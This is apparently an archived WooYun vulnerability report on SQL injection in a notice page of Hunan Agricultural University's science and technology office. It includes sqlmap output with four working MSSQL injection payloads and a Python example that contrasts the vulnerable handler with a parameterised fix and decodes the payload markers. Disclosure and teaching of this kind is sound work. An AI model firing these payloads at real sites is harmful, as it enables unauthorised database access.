WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing --------------- http://drop.zone.ci/
2015-12-29: Details sent to the vendor, awaiting vendor handling
2016-01-04: Vendor confirmed; details disclosed to the vendor only
2016-01-14: Details disclosed to core white hats and domain experts
2016-01-24: Details disclosed to regular white hats
2016-02-03: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
SQL injection in the Hunan Agricultural University Science and Technology Office site
Injection point: http://**.**.**.**/kjc_notice/main_readnotice.asp?id=8a8889a0504ad14d01516bab606c584e
sqlmap output (the GET parameter 'id' is injectable in four different ways):

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8a8889a0504ad14d01516bab606c584e' AND 1517=1517 AND 'wyQq'='wyQq

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=8a8889a0504ad14d01516bab606c584e' AND 8651=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8651=8651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'aExn'='aExn

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=-1600' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(103)+CHAR(76)+CHAR(103)+CHAR(81)+CHAR(65)+CHAR(107)+CHAR(68)+CHAR(118)+CHAR(80)+CHAR(88)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=-5928' OR 4638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zhXY'='zhXY
---
[15:20:04] [INFO] testing Microsoft SQL Server
[15:20:15] [INFO] confirming Microsoft SQL Server
[15:20:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
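The sqlmap output above shows the two things a reviewer wants to understand: how the boolean-based blind check confirms that 'id' is concatenated into the query, and what the CHAR(...)+CHAR(...) chains in the error-based and UNION payloads actually spell. The following is an added example written for this page, not code from the report or from the affected site. It reconstructs the injectable pattern as a hypothetical handler (the real main_readnotice.asp source is not on the page), places the parameterised fix next to it, runs sqlmap's true/false pair from the report against both, and decodes the UNION payload's string. sqlite3 stands in for the site's Microsoft SQL Server 2005 because it runs offline; the boolean payloads are dialect-neutral, so they behave the same on both. The notice rows are constructed sample data.

```python
import re
import sqlite3

# Constructed stand-in for the notice table behind main_readnotice.asp.
# Real backend per the sqlmap output: Microsoft SQL Server 2005; sqlite3 is
# used here only so the example runs offline.
SAMPLE_ROWS = [
    ("8a8889a0504ad14d01516bab606c584e", "Call for 2016 project applications"),
    ("0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f", "Office closed during the holiday"),
]

NOTICE_ID = "8a8889a0504ad14d01516bab606c584e"

# Boolean-based blind payloads in the shape sqlmap reported for this target:
# the real id, a condition that is true in one request and false in the other,
# then a quote-balancing tail so the statement still parses.
TRUE_PAYLOAD = NOTICE_ID + "' AND 1517=1517 AND 'wyQq'='wyQq"
FALSE_PAYLOAD = NOTICE_ID + "' AND 1517=1518 AND 'wyQq'='wyQq"

# The string literal sqlmap built for its UNION payload, copied from the
# report (MSSQL concatenates strings with '+').
UNION_CHAR_CHAIN = (
    "CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(103)+CHAR(76)"
    "+CHAR(103)+CHAR(81)+CHAR(65)+CHAR(107)+CHAR(68)+CHAR(118)+CHAR(80)"
    "+CHAR(88)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)"
)


def make_db():
    """Build the in-memory stand-in database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notice (id TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO notice VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def read_notice_vulnerable(conn, id_param):
    """Hypothetical reconstruction of the injectable pattern (not the page's
    actual source): the untrusted 'id' GET parameter is pasted into the SQL."""
    sql = "SELECT title FROM notice WHERE id='" + id_param + "'"
    return [row[0] for row in conn.execute(sql)]


def read_notice_fixed(conn, id_param):
    """Parameterised query: the value is bound, so quotes and keywords in it
    can never change the statement's structure."""
    sql = "SELECT title FROM notice WHERE id=?"
    return [row[0] for row in conn.execute(sql, (id_param,))]


def is_boolean_blind_injectable(fetch, conn):
    """sqlmap's confirmation step for boolean-based blind injection: the
    parameter is injectable when the true and false conditions produce
    different responses from the same handler."""
    return fetch(conn, TRUE_PAYLOAD) != fetch(conn, FALSE_PAYLOAD)


def decode_char_chain(expr):
    """Turn a CHAR(n)+CHAR(n)+... chain back into the text it spells."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def split_markers(text, marker_len=5):
    """Separate the fixed prefix and suffix from the random token between them.
    Every payload in the report above opens its string with 'qzpxq' and closes
    it with 'qvjvq'; those markers are how sqlmap finds the injected value
    inside an arbitrary HTML page or error message."""
    return text[:marker_len], text[marker_len:-marker_len], text[-marker_len:]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:",
          is_boolean_blind_injectable(read_notice_vulnerable, db))
    print("fixed handler injectable:",
          is_boolean_blind_injectable(read_notice_fixed, db))
    marker_string = decode_char_chain(UNION_CHAR_CHAIN)
    print("UNION marker string:", marker_string)
    print("prefix / token / suffix:", split_markers(marker_string))
```

Against the concatenating handler the true payload returns the notice and the false payload returns nothing, which is exactly the difference sqlmap keys on; against the bound-parameter version both payloads are just a non-matching id and the responses are identical. The decoded UNION string shows sqlmap's prefix, a random token, and its suffix, the same 'qzpxq' ... 'qvjvq' pair that wraps the CASE expression in the error-based payload.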
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-01-04 14:33
Status: vendor notified, handling in progress
None yet